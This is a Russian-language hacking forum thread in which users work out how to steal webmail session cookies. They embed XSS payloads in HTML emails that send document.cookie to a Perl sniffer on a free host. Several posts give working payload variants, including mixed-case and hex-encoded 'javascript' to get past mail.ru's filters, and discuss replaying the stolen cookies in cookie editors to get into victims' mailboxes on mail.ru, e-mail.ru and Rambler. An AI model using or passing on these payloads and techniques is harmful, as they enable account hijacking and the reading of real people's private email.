Запустил у себя на бесплатном хосте (hut.ru) сниффер на perl. Работает отлично - рефку присылает. Но проблема в том, что не получается пока с куками. Понял, что для передачи куков нужно послать письмо в html формате с ява-скриптом: <img src="javascript:img = new Image(); img.src = '/cgi-bin/s.jpg?'+document.cookie;"> В скрипте есть адресс сниффера. Потом с лога сниффера забираем файлы куки, а дальше работаем с проксомитроном (или др. редактором куков). Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ? Посоветуйте плиз, где у меня ошибка (можно в приват). Заранее благодарен, так как вижу, что этот вопрос интересует многих.
может быть не работает сам XSS в твоей почте: <img src="javascript:"> Может браузер не поддерживает функц. Image(). попробуй по-порядку
PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru. <img src="javascript:img = new Image(); img.src = '/cgi-bin/s.jpg?'+document.cookie;"> Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ? На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок. <xtitle>Непонятный заголовок</xtitle> </xhead> <xbody> <IMG src=xjavascript:document.images[0].src='/cgi-bin/s.jpg?'+document.cookie;> </xbody> </xhtml> Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный. Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.
/showthread.php?p=43322 Здесь Майор писал рабочий на данный момент способ обхода фильтра для mail.ru. В твоем случае это выглядит так: <image src=JaVaScRiPt:document.images[0].src="/cgi-bin/s.jpg?"+document.cookie;>
Thank you Майор & Xattab ! Интересно, а кто-нибудь юзал прогу Minibrowser v2.20 для подстановки куков. Очень интересная прога ! За исключением того, что не хочет открывать папки на mail.ru. На рамблере без проблем. В принципе и Opera рулит, но не очень удобно делать подстановку снифф-куки.